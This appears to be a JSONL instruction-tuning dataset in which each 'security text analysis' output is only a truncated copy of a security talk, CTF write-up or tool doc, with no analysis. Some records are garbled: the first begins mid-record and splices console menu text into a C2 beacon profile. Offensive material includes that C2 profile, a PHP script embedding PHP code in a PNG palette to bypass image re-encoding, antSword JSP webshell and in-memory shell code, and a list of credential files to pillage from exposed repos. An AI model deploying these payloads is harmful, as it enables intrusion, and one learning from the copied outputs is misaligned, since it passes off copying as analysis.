HTTP SMB TCP Payload Profiles via C4 Profilers { \"payload_config\": { \"main_http\": { \"c2_auth\": \"abcd@123\", \"c2_uri\": [ \"content.php\", \"admin.php\" ], \"extra_headers\": { \"Cache-Control\": \"no-cache\", \"Connection\": \"close\", \"Cookie\": \"AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2; Version=default; id=a3fWa; Expires=Thu 31 Oct 2021 07:28:00 GMT;\", \"Pragma\": \"no-cache\", \"Referer\": \"https://mail.microsoft.com\", \"x-pm-apiversion\": \"3\", \"x-pm-appversion\": \"Web_3.16.33\", Badger Management - Beacon Management Badger Console double clicking a badger or right clicking and selecting the Load button Process Manager \"x-pm-uid\": \"d0e1f5b0dc08202064de25a\", \"Host\": \"test.azureedge.net\" }, \"host\": \"10.10.10.1\", \"port\": \"443\", \"ssl\": true, \"type\": \"HTTP\", \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 F", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: dex2jar categories: Hardware Hacking tags: [dex2jar,Hardware Hacking,kali linux] date: 2019-06-25 11:19:00 --- 0x00 dex2jar介绍 ------------- dex2jar包含以下这些组件: - dex读取器用来读取Dalvik可执行文件(.dex/.odex)它有与ASM相似的轻量级API - dex翻译器用来进行转换它以dex-ir格式读入dex指令经过一些调整转换为ASM格式 - dex-ir在翻译器中使用用来表示dex指令 - dex工具用来处理.class文件例如修改apk文件反混淆jar文件等 - d2j-smali [待发布]反汇编dex文件将之还原为smali文件或从smali文件编译为dex文件 与smali/baksmali的执行方式不同两者语法相同但是本工具支持在desc类型中的转义Lcom/dex2jar\\t\\u1234; - dex写入器[待发布]以和dex读取器相同的方式写入数据 原项目地址: https://github.com/pxb1988/dex2jar/ dex2jar主页 | [Kali上的dex2jar项目](http://git.kali.org/gitweb/?p=packages/dex2jar.git;a=summary) - 作者: Panxiaobo - 证书: Apache-2.0 0x01 包含的工具 ---------------- ##### d2j-jar2dex  调用dx将jar转换为dex ``` root@kali:~# d2j-jar2dex -h d2j-jar2dex -- 调用dx将jar转换为dex 用法: d2j-jar2dex [参数] <目录> 参数: -f,--force 强制覆写 -h,--help 显示此帮助信息 -o,--output <out-dex-file> 输出.dex文件默认路径是$current_dir/[jar-name]-jar2dex.dex 版本: 0.0.9.15 ``` ##### d2j-jar-remap重命名jar文件中的包(package)/类(class)/方法(method)/域(field) ``` root@kali:~# d2j-jar-remap -h d2j-jar-remap -- 重命名jar文件中的包(package)/类(class)/方法(method)/域(field) 用法: d2j-jar-remap [参数] <jar文件路径> 参数: -c,--config <config> 重构用到的的配置文件此项必须指定 -f,--force 强制覆写 -h,--help 显示此帮助信息 -o,--output <out-jar> 输出.jar文件默认路径是$current_dir/[jar-name]-remap.jar 版本: 0.0.9.15 在线帮助文档: https://code.google.com/p/dex2jar/wiki/DeObfuscateJarWithDexTool ``` ##### d2j-dex2jar将dex转换为jar ``` root@kali:~# d2j-dex2jar -h d2j-dex2jar -- 将dex转换为jar 用法: d2j-dex2jar [参数] <0号文件> [其他文件] options: -d,--debug-info 翻译调试信息 -e,--exception-file <file> 具体的异常信息文件默认是$current_dir/[file-name]-error.zip -f,--force 强制覆写 -h,--help 显示此帮助信息 -n,--not-handle-exception 不捕获dex2jar抛出的任何异常 -o,--output <out-jar-file> 输出.jar文件默认是$current_dir/[file-name]-dex2jar.jar -os,--optmize-synchronized 同步调整 -p,--print-ir 将ir输出到Syste.out -r,--reuse-reg 生成java的.class文件时循环使用注册表 -s 与--topological-sort/-ts相同 -ts,--topological-sort 以拓扑逻辑整理块能够生成更多可读代码 -v,--verbose 显示进度 版本: 读取器-1.15, 翻译器-0.0.9.15, ir-1.12 ``` ##### dex2jar此工具已被弃用若", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBug Hunters dump user data. Can they keep it? Well theyre keeping it anyway. Who? Data Protection Officer & Privacy Attorney - a lawyer, but not your lawyer Co-Founder of Truffle Security, TruffleHog author, bug hunter, security researcher, etc Whitney Merrill @wbm312 Dylan Ayrey @InsecureNature Do bug hunters touch your data? Job done. Crap. Yes. Not yet Theres data everywhere Data flow diagram Employee laptop XSSHunter* Gmail My Hard drive Time machine Bug tracker *and/or other similarly situated third-party tool XSSHunter isnt clear The bug platform itself This incident isnt isolated All the bug hunters I asked Uh yeah Never hurts to ask Dang. Holy crap that worked. Your PoC exfiltrated email addresses but it seems other PII could have been hypothetically at risk. The user base was relatively small (a few thousand) as this was an experimental project.\" Be sure that any PII that was in your PoC should be obfuscated. We are excited that we can be included in your talk and help give back to the security community.\" Asked to delete data? No. Maintain data access through ticket? Yes. Disclosure notifications? Not to my knowledge. Re: notification. We are following our usual privacy incident process, that includes notification of customers in case it's necessary. Not sure if it was necessary in this case, our team doesn't see that part of the process.\" Asked to delete data? No. Maintain data access through ticket? Yes. Disclosure notifications? Not to my knowledge. Wait hold up. Asked to delete data? No. Maintain data access through ticket? Yes. Disclosure notifications? Not to my knowledge. What about other researchers? What about other researchers? https://blog.assetnote.io/bug-bounty/2019/01/14/gaining-access-to-ubers-user-data-through-ampscript-evaluation/ Making it rain Shubs Asked to delete data? No. Maintain data access through ticket? Yes. Disclosure notifications? Not to his knowledge. What about other researchers? https://samcurry.net/hacking-starbucks/ I tried my best ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPresentation Slides with Notes: Predicting Susceptibility to Social Bots on Twitter by Chris Sumner & Dr. Randall Wald Presented at: Black Hat Briefings 2013 (Las Vegas, NV, USA) & DEF CON 21 (Las Vegas, NV, USA) Slide 1 Predicting Susceptibility to Social Bots on Twitter Chris Sumner & Dr. Randall Wald chris@onlineprivacyfoundation.org & rwald1@fau.edu Welcome to Predicting Susceptibility to Social Bots on Twitter. Im Chris Sumner, representing the Online Privacy Foundation and Im joined by Dr. Randall Wald from Florida Atlantic University. The Online Privacy Foundation is a non-profit, charitable organisation, currently focused on understanding what people might be giving away via social networks without their knowledge. https://www.onlineprivacyfoundation.org/ Before we begin, I want to make sure people have the chance to decide whether this talk is really for them Note: Majority of images via Shutterstock.com Slide 2 Web Ecology Project Tim Hwang Astroturfing Swiftboating Yazan Boshmaf If youre familiar with these names/terms, you may find the first half of this presentation a little on the light/introductory side. Slide 3 Contains some maths We also talk about Statistics and Machine Learning (sometimes referred to as Predictive Analytics). Well keep this to a minimum, but ensure the slide notes contain more detail. Well also include some hidden slides in the hand-outs which provide more details. So on to the talk Slide 4 Its only fitting, since were in Las Vegas, that we talk about odds. Slide 5 Goal = Improve the odds The goal of our work was to see if we could improve the odds of finding users more likely to respond to a relatively crude twitter bot While it would be interesting, we never expected to be able to predict susceptibility with laser like accuracy. Predictions need not be accurate to score big value (page 10 - Book. Predictive analytics  The power to predict who will click, buy, lie or die  Eric Siegel) Ref: Siegel, E. 2013. Predictive analytics. H", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Baby DLP (crypto) ## ENG [PL](#pl-version) In the task we get [server code](server.py) to analyse. In short we can send to the server a number `s` and server responds with `c = pow(2, flag  s, p)`. Our goal is, of course, to recover the flag. As the taks name suggests, if we could calculate discrete logarithm, we could easily get back the flag. But it's not the only way. Let's look closely what the server does - it XORs the exponent with a value we provide! What would happen if we flip a single bit in the exponent? - If we change `k-th` bit from 0 to 1 then we simply add `2**k` to the exponent. It means that `c' = pow(2, flag + 2**k, p) = c * pow(2, 2**k, p) mod p` - Otherwise we must have changed `k-th` bit from 1 to 0. Flipping a single bit is trivial, we simply need to send as input a number which has only a single high bit as `k-th` position, and this will flip the `k-th` bit of the `flag` on the server. So the solution is: 1. Send `0` as input to recover original `c` value from the server 2. Send `1`,`2`,`4`,...,`2**k` as input and check if `result == c * pow(2, 2**k, p) % p` and if it is then `k-th` bit was originally `0`, otherwise it was `1` ```python from Crypto.Util.number import size, long_to_bytes from crypto_commons.netcat.netcat_commons import nc, send def main(): url = 'ppc2.chal.ctf.westerns.tokyo' port = 28459 s = nc(url, port) p = 160634950613302858781995506902938412625377360249559915379491492274326359260806831823821711441204122060415286351711411013883400510041411782176467940678464161205204391247137689678794367049197824119717278923753940984084059450704378828123780678883777306239500480793044460796256306557893061457956479624163771194201 g = 2 send(s, '0') reference = int(s.recv(99999)[2:], 16) # original ciphertext payload = 1L bits = [] for i in range(size(p)): print('testing ', i) send(s, hex(payload)[2:-1]) result = int(s.recv(99999)[2:], 16) if result == (reference * pow(g, payload, p)) % p: bits.append('0') else: bits.append('1') payload <<= 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nuncompress === 用来解压.Z文件 ## 补充说明 **uncompress命令** 用来解压缩由compress命令压缩后产生的.Z压缩包 ### 语法 ```shell uncompress(选项)(参数) ``` ### 选项 ```shell -f不提示用户强制覆盖掉目标文件 -c将结果送到标准输出无文件被改变 -r递归的操作方式 ``` ### 参数 文件指定要压缩的.Z压缩包 ### 实例 先创建一个.Z压缩文件 ```shell compress FileName ``` 解压 ```shell uncompress FileName.Z ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 杂记 企业安全建设领域内主要和管理运营相关的一些杂记 - 多刷存在感有时甚至是一些宣传工作例如做成日常安全教育的漫画贴在公司的电梯间因为做信息安全经常遇到的一个问题就是做得好没有存在感出了事情就背锅在这种大环境下安全负责人和团队其实要更多地在公司和全员面前刷存在感让大家都知道我们在做事情并且是在做有意义的事情让大家明白我们在做什么事情也会更加配合我们的工作这样就慢慢会成为一个良心循环当然其中会有各种细节需要考虑", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwww.senseofsecurity.com.au  Sense of Security 2013 Page #  13-Sep-13 Compliance, Protection & Business Confidence Sense of Security Pty Ltd ! Sydney Level 8, 66 King Street Sydney NSW 2000 Australia Melbourne Level 10, 401 Docklands Drv Docklands VIC 3008 Australia T: 1300 922 923 T: +61 (0) 2 9290 4444 F: +61 (0) 2 9290 4455 info@senseofsecurity.com.au www.senseofsecurity.com.au ABN: 14 098 237 908 VoIP Wars: Attack of the Cisco Phones www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Speaker  Fatih Ozavci  Senior Security Consultant  Interests  VoIP  Mobile Applications  Network Infrastructure !  Author of Viproy VoIP Penetration Testing Kit  Public Speaker  Defcon, BlackHat Arsenal, AusCert, Ruxcon 2 www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Viproy VoIP Toolkit  Viproy is a Vulcan-ish Word that means \"Call\"  Viproy VoIP Penetration and Exploitation Kit  Testing modules for Metasploit, MSF license  Old techniques, new approach  SIP library for new module development  Custom header support, authentication support  Trust analyser, SIP proxy bounce, MITM proxy, Skinny, VOSS  Modules  Options, Register, Invite, Message  Brute-forcers, Enumerator  SIP trust analyser,SIP proxy, Fake service  Skinny analysers, VOSS exploits 3 www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Agenda 1. Hosted VoIP Services and Cisco 101 2. Network Infrastructure 3. Cisco Unified Communications Manager 4. IP Phone and Service Management 5. Attacking Desktop and Mobile Clients 4 www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Hosted VoIP services 5 www.senseofsecurity.com.au  Sense of Security 2014 Page of 58  Aug-14 Cisco VoIP environment  Web based services  IP Phone services (Cisco, VOSS)  Tenant client services (VOSS Selfcare)  Tenant* management services (Cisco HCS)  VoIP services  Skinny (SCCP) services for Cisco phones  SIP services for other tenant phones  RTP services for media streaming  PBX/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# F#ck (re 50) ###ENG [PL](#pl-version) In the task we get a [binary](FlagGenerator.exe) which is written in F#. Like every other .NET binary it can be nicely decompiled by ILSpy. With this we didn't even need to reverse the algorithm at all. We simply modified the decompiled code we got so that we could compile it again: ```csharp using System; using System.Globalization; class X { public string str; public int[] ccIndices; internal X(string str, int[] ccIndices) { this.str = str; this.ccIndices = ccIndices; } public string Invoke(int i) { if (i == this.ccIndices.Length - 1) { return this.str.Substring(i); } int num = this.ccIndices[i]; return this.str.Substring(num, this.ccIndices[i + 1] - num); } } public class Test { public static string get_flag(string str) { int[] array = StringInfo.ParseCombiningCharacters(str); int num = array.Length; X fSharpFunc = new X(str, array); string[] array2 = new string[num]; int num2 = 0; int num3 = num - 1; if (num3 >= num2) { do { array2[num2] = fSharpFunc.Invoke(num2); num2++; } while (num2 != num3 + 1); } string[] array3 = array2; Array.Reverse(array3); return string.Join(\"\", array3); } public static void Main() { Console.WriteLine(get_flag(\"t#hs_siht_kc#f\")); } } ``` And we got `EKO{f#ck_this_sh#t}`. ###PL version W zadaniu dostajemy [program](FlagGenerator.exe) napisany w F#. Jak każda inna binarka .NET można go ładnie zdekompilować za pomocą ILSpy. Uzyskujemy w ten sposób dość ładny kod i nie było potrzeby nawet reversować algorytmu. Zmodyfikowaliśmy uzyskany kod tak, żeby dało się go skompilować i uruchomić: ```csharp using System; using System.Globalization; class X { public string str; public int[] ccIndices; internal X(string str, int[] ccIndices) { this.str = str; this.ccIndices = ccIndices; } public string Invoke(int i) { if (i == this.ccIndices.Length - 1) { return this.str.Substring(i); } int num = this.ccIndices[i]; return this.str.Substring(num, this.ccIndices[i + 1] - num); } } public class Test { public static s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 19 // Adam Baldwin Pillaging DVCS Repos ...for fun and profit $ whoami Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin @adam_baldwin Co-Founder of nGenuity Pentester of webs evilpacket.net WTF is DVCS Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Objectives Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Identify web accessible repos Pillage as much info as possible ??? Profit Alexa top million sites Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin GIT HG BZR GIT: 1498 repos HG: 312 repos BZR: 235 repos Repo Identification Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin GIT: .git/HEAD HG: .hg/requires BZR: .bzr/README http://example.com/.git/HEAD W3AF Plugin Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Cloning Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin 0. Check for dir browsing 1. Get predictable files 2. List repo files 3. Download references to files 4. Restore the repo (if possible) Pillaging Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Platform details (.php, .cgi, etc) Downloadable files (.old, .sql) Source Code Credentials / Certs / API Keys Pillaging Ideas Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin .sql / .sql.bz2 .pem config .bak .sql.gz .xls / .xlsx .ini .cfg .tar / .tar.gz .doc / .docx .sh export htpasswd private .qbw / .mny backup id_rsa .pst / .ost confidential dump / .dmp id_dsa settings .csv .txt Thanks to @flirzan & @quitlahok for some of these! Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin Montage of fail <- Twitter API <- Facebook API <- MySpace API <- Google API <- Auth Required? Nope Database Passwords <- SSH Keys htpasswd -> Customer Invoices Demo Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin The Tool Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin https://github.com/ngenuity/DVCS-Pillage Questions? adam@ngenuity-is.com // @adam_baldwin Pillaging DVCS Repos // DEFCON 19 // @adam_baldwin References nGenuity: http://ngenuity-is.com http://ngenuity-is.com/blog/2011/mar/22/gotta-git-up-to-get-dow", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuild a free cellular traffic capture tool with a vxworks based femoto Hacking Femtocell Hacking Femtocell 1 Yuwei Zheng @DEF CON 23 Haoqi Shan @DEF CON 23 From: 360 Unicorn Team Main contents Hacking Femtocell  About us  Why do we need it  How to get a free Femtocell  Deeply Hack  Capture packets  Summary and Reference 2 About us Hack Femtocell  360 Unicorn Team  Radio & Hardware Security Research  Consists of a group of brilliant security researchers  Focus on the security of anything that uses radio technologies  RFID, NFC, WSN  GPS, UAV, Smart Cars, Telecom, SATCOM  Our primary mission  Guarantee that Qihoo360 is not vulnerable to any wireless attack  Qihoo360 protects its users and we protect Qihoo360  One of the Defcon 23 vendors  https://www.defcon.org/html/defcon-23/dc-23-vendors.html 3 About me Hacking Femtocell  Yuwei Zheng  a senior security researcher concentrated in embedded systems  reversed blackberry BBM, PIN, BIS push mail protocol  decrypted the RIM network stream successfully in 2011  finished a MITM attack for blackberry BES  Haoqi Shan  a wireless/radio security researcher in Unicorn Team  obtained bachelor degree of electronic engineering in 2015  focuses on Wi-Fi penetration, GSM system, router/switcher hacking 4 Why do we need it Hacking Femtocell  Research on products integrated cellular modem  Capture and hijack  SMS  Voice  Data traffic 5 Why not software-based GSM base station Hacking Femtocell  OpenBTS  USRP  GNU Radio  Why not?  Data traffic hijack  Access denied to operator core network  NO real uplink & downlink SMS hijack 6 Femtocells advantages Hacking Femtocell  Access to network operator  What a hacked Femtocell can do  SMS and Data traffic  Capture  Hijack  Modify  Even more  Roaming in operators network 7 Use Femtocell in research Hacking Femtocell  Cellular modem integrated devices  Capture or modify control order  SMS  2G  Capture or modify circle data  SMS  2G  Trusted data link?  Find your system vulnerability 8 How to get a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## XOR Crypter (crypto 200p) Description: The state of art on encryption, can you defeat it? CjBPewYGc2gdD3RpMRNfdDcQX3UGGmhpBxZhYhFlfQA= ### PL [ENG](#eng-version) Cały kod szyfrujący jest [tutaj](shiftcrypt.py). Szyfrowanie jest bardzo proste, aż dziwne że zadanie było za 200 punktów. Szyfrowanie polega na podzieleniu wejściowego tekstu na 4 bajtowe kawałki (po dodaniu paddingu jeśli to konieczne, aby rozmiar wejścia był wielokrotnością 4 bajtów), rzutowanie ich na inta a następnie wykonywana jest operacja `X xor X >>16`. Jeśli oznaczymy kolejnymi literami bajty tego inta uzyskujemy: `ABCD  ABCD >> 16 = ABCD  00AB = (A0)(B0)(CA)(DB) = AB(CA)(DB)` Jak widać dwa pierwsze bajty są zachowywane bez zmian a dwa pozostałe bajty są xorowane z tymi dwoma niezmienionymi. Wiemy także że xor jest operacją odwracalną i `(AB)B = A` możemy więc odwrócić szyfrowanie dwóch ostatnich bajtów xorując je jeszcze raz z pierwszym oraz drugim bajtem (pamiętając przy tym o kolejności bajtów) ```python data = \"CjBPewYGc2gdD3RpMRNfdDcQX3UGGmhpBxZhYhFlfQA=\" decoded = base64.b64decode(data) blocks = struct.unpack(\"I\" * (len(decoded) / 4), decoded) output = '' for block in blocks: bytes = map(ord, struct.pack(\"I\", block)) result = [bytes[0]  bytes[2], bytes[1]  bytes[3], bytes[2], bytes[3]] output += \"\".join(map(chr, result)) print(output) ``` W wyniku czego uzyskujemy flagę: `EKO{unshifting_the_unshiftable}` ### ENG version Cipher code is [here](shiftcrypt.py). The cipher is actually very simple, it was very strange that the task was worth 200 point. The cipher splits the input text in 4 byte blocks (after adding padding if necessary so that the input is a multiply of 4 bytes), casting each block to integer and the performing `X xor X >>16`. If we mark each byte of the single block with consecutive alphabet letters we get: `ABCD  ABCD >> 16 = ABCD  00AB = (A0)(B0)(CA)(DB) = AB(CA)(DB)` As can be noticed, first two bytes are unchanged and last two are xored with those two unchanged. We also kn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPrinting is still the Stairway to Heaven A Decade After Stuxnets Printer Vulnerability LABS Peleg Hadar Senior Security Researcher & Tomer Bar Research Team Lead | Peleg Hadar Senior Security Researcher  7+ years in InfoSec  Senior Security Researcher @ SafeBreach Labs  Main focus in Windows internals and vulnerability research  @peleghd 2 LABS Tomer Bar Research Team Lead  15+ years in Cyber Security  Research Team Lead @ SafeBreach Labs  Main focus in APT and vulnerability research  Past publications:  Prince of Persia - Terminating 10 Years Campaign For Fun And Profit  Infy Malware Active In Decade Of Targeted Attacks  KasperAgent and Micropsia - Targeted Attacks In The Middle East  Ride The Lightning With Foudre  Double Edge Sword Attack - Exploiting Quasar Rat Command and Control  BadPatch (APT-C-23) 3 LABS 4 Agenda Is Stuxnet 2.0 possible?  Analysis of Stuxnets propagation capabilities (vulnerabilities)  Root Cause  Patch  Re-Exploitation / Equivalent newer vulnerability in the same component  Our Research  How did we re-exploited a patched 10 years old MS Windows vulnerability  Demonstration of 2 unpatched 0-day vulnerabilities (Pre-coordinated with Microsoft)  Mitigations and Suggestions  Better Patch  Better real-time prevention for an entire bug class Stuxnet 2.0 Patch effectiveness 5 Agenda two main takeaways Is it possible to abuse patched vulnerabilities? Is it possible to re-occur? 6 Terminology Narrow Patch Patch 7 Stuxnet Recap & Timeline 8 Stuxnet As Seen in 0 Days 9 Propagation Capabilities 5 Vulnerabilities 2 LPE 3 RCE Rootkit Stolen Certificate Final Payload Siemens Related Actions Evasion Capabilities ICS Target Detection ICS Capabilities Stuxnet Main Building Blocks MS10-046 (LNK) MS10-061 (Spooler) Spooler Propagation Capabilities 10 MS06-040 (RPC) MS10-092 (Task Scheduler) MS10-073 (Win32k) Now, over 22 million pieces of malware use that blueprint to attack organizations and states -regdox.com MS10-046 (LNK) MS10-061 (Spooler) Spooler Propagatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Basics Category: Hardware > With all those CPU bugs I don't trust software anymore, so I came up with my custom TPM (trademark will be filed soon!). You can't break this, so don't even try. The following files were attached: `main.cpp`: ```cpp #include \"obj_dir/Vcheck.h\" #include <iostream> #include <memory> int main(int argc, char *argv[]) { Verilated::commandArgs(argc, argv); std::cout << \"Enter password:\" << std::endl; auto check = std::make_unique<Vcheck>(); for (int i = 0; i < 100 && !check->open_safe; i++) { int c = fgetc(stdin); if (c == '\\n' || c < 0) break; check->data = c & 0x7f; check->clk = false; check->eval(); check->clk = true; check->eval(); } if (check->open_safe) { std::cout << \"CTF{real flag would be here}\" << std::endl; } else { std::cout << \"=(\" << std::endl; } return 0; } ``` `check.sv`: ```verilog module check( input clk, input [6:0] data, output wire open_safe ); reg [6:0] memory [7:0]; reg [2:0] idx = 0; wire [55:0] magic = { {memory[0], memory[5]}, {memory[6], memory[2]}, {memory[4], memory[3]}, {memory[7], memory[1]} }; wire [55:0] kittens = { magic[9:0], magic[41:22], magic[21:10], magic[55:42] }; assign open_safe = kittens == 56'd3008192072309708; always_ff @(posedge clk) begin memory[idx] <= data; idx <= idx + 5; end endmodule ``` ## Solution So this is basically a HW module representation in Verilog. The C++ part reads a password and feeds it to the HW module. The HW module reads one character at time into the `data` input, then stores it in a `memory` register, which is an array of 8 element, where each element is 7 bits wide (just enough for an ASCII character). This causes the `magic` and `kittens` wires to get a value based on the memory, and if the value is right - the `open_safe` wire is set, allowing us to read the flag. We can use a [Verilog simulator](https://www.tutorialspoint.com/compile_verilog_online.php) to simulate the flow. We'll add a print for the expected value of `kittens` based on the constant in the code, and we", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nquickbreach@defcon26:~# ./smbetray.py --help Backdooring & Breaking Signatures William Martin (@QuickBreach) > whoami  William Martin  OSCP  Penetration Tester  Supervisor at RSM US LLP in Charlotte, NC  Second time presenting at DEFCON  Twitter: @QuickBreach > Who is this talk for?  Red teamers looking to learn more about Active Directory, SMB security, and pick up new attacks against insecure SMB connections  Blue teamers that want to stop the red teamers from using what they learn  Anyone curious about how SMB signing actually works > Overview  Brief recap on what SMB is  NTLMv2 Relay attack  Investigate what SMB signing actually is  How else we can attack SMB?  Introduce SMBetray  Demo & tool release  Countermeasures  Credits Recap on SMB SMB server = Any PC receiving the SMB connection, not necessarily a Windows Server OS. Eg, a Windows 7 box can be the SMB server, as every Windows OS runs an SMB server by default SMB client = The PC/Server connecting to the SMB server > Terminology clarification > Recap on SMB (Source: https://docs.microsoft.com/en-us/windows/desktop/fileio/microsoft-smb-protocol-and-cifs-protocol- overview) > Recap on SMB SMB listens on TCP port 445 and allows for file sharing and management over the network, with features including:  Mapping network drives  Reading & writing files to shares  Authentication support  Providing access to MSRPC named pipes > What is SMB? > Recap on SMB Attackers love it for:  Pass-the-hash  System enumeration (authenticated, or null sessions)  Spidering shares & hunting for sensitive data, such as for the cpassword key in SYSVOL xml files > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB > Current attacks against SMB What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? > What is SMB signing? What", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntitle: 蚁剑改造计划之支持内存马 author: yzddmr6 blog: yzddmr6.tk 前言 最近因为各种事情太忙了博客也很久没有更新了今天暂且先水一篇 前几天发了一版新的蚁剑JSP一句话的payload这篇文章记录一下更新的细节 1. 兼容高版本JDK 这个没啥好说的就是base64解码的问题在jdk9开始移除了sun.misc这个包导致原有的 sun.misc.BASE64Decoder 没法继续使用取而代之的是 java.util.Base64 这个类 解决办法就是两个都试一下看哪个能解码成功核心代码如下 2. 兼容Tomcat内存马 这个问题可以掰扯一下很多文章都提到了冰蝎或者蚁剑连接内存马的问题 除了由于写法问题而导致的各种乱七八糟的问题以外其中主要的一个问题是冰蝎在入口处采用了 pageContext这个类来获取request response session对象本人以冰蝎为原型实现的蚁剑JSP一句话同 样采用了pageContext作为入口但是以filter型内存马为例doFilter中三个参数分别是 ServletRequestServletResponseFilterChain并不存在pageContext这个东西 那么大体上有三种解决办法 1. 自己声明一个pageContext类在里面实现对应的request跟response的getter setter冰蝎改造 之不改动客户端=>内存马 2. 改写冰蝎的入口为request+response不再采用pageContext作为入口但是弊端就是不能再用 equals了要重新写一个方法用反射调用冰蝎改造之适配基于tomcat Filter的无文件webshell 3. 采用蚁剑原来的Custom模式把恶意函数直接通过字节码打进去然后通过方法名调用不过由 于直接编译恶意函数的字节码较大会超过最大长度限制一般要先写入目标然后配合 URLClassLoader才能使用使用WebLogic CVE-2020-2883配合Shiro rememberMe反序列化一 键注入蚁剑shell 以上的这些方法可以是可以但是不够优雅 public byte[] base64Decode(String str) throws Exception { try { Class clazz = Class.forName(\"sun.misc.BASE64Decoder\"); return (byte[]) clazz.getMethod(\"decodeBuffer\", String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz = Class.forName(\"java.util.Base64\"); Object decoder = clazz.getMethod(\"getDecoder\").invoke(null); return (byte[]) decoder.getClass().getMethod(\"decode\", String.class).invoke(decoder, str); } } 回想我们最开始的问题为什么要用pageContext是为了拿到当前请求的上下文更精确一点就是输 入输出request,response经过实际调试可以发现 在request中本身就包含了当前的response同样response中也包含了当前的request 虽然蚁剑没有用到session对象但是需要的时候也可以通过request来获取 也就是通过request或者response任意一个就能完全代替pageContext这也是在新版payload中采取 的方案 核心代码如下 if (obj instanceof PageContext) { PageContext page = (PageContext) obj; request = (HttpServletRequest) page.getRequest(); response = (HttpServletResponse) page.getResponse(); 在equals中收到一个对象后会依次判断是否是 PageContext/HttpServletRequest/HttpServletResponse然后根据情况拿到request跟response从 而实现对内存马的兼容 实现效果 测试环境 在equals中填入request对象 } else if (obj instanceof HttpServletRequest) { request = (HttpServletRequest) obj; t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<?php //createPNGwithPLTE.php // bypass imageCreateFromPng and imagepng $_payload=\"<?php phpinfo()?> \"; $_pay_len=strlen($_payload); if(strlen($_payload)%3!=0){ echo \"payload%3==0 !\"; exit(); } $width=$_pay_len/3; $height=20; //$im = imageCreateFromPng(\"existing.png\"); $im = imagecreate($width, $height); $_hex=unpack('H*',$_payload); $_chunks=str_split($_hex[1], 6); for($i=0; $i < count($_chunks); $i++){ $_color_chunks=str_split($_chunks[$i], 2); $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2])); imagesetpixel($im,$i,1,$color); } imagepng($im,\"example.png\");", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### npm 命令 NPM的全称是Node Package Manager是随同NodeJS一起安装的包管理和分发工具它很方便让JavaScript开发者下载安装上传以及管理已经安装的包 **装包** ``` npm install [包名]@3.9.1 --save //简写npm i //@3.9.1指定版本号 //--save将包添加到packae.json ``` **安装工具** ``` npm install [包名]@3.9.1 --save-dev //简写-D ``` **全局安装** ``` npm install [包名] --global //简写-g ``` **卸载** ``` npm uninstall [包名] ``` 删除全局环境下的包 ``` npm uninstall [包名] -g ``` **查看全局插件命令** ``` npm list -g --depth //简写npm ls -g ``` 查看模块版本 ``` npm version //简写npm -v ``` 检查模块是否已经过时 ``` npm outdated ```", "category": "text_analysis", "source": "security_papers"}
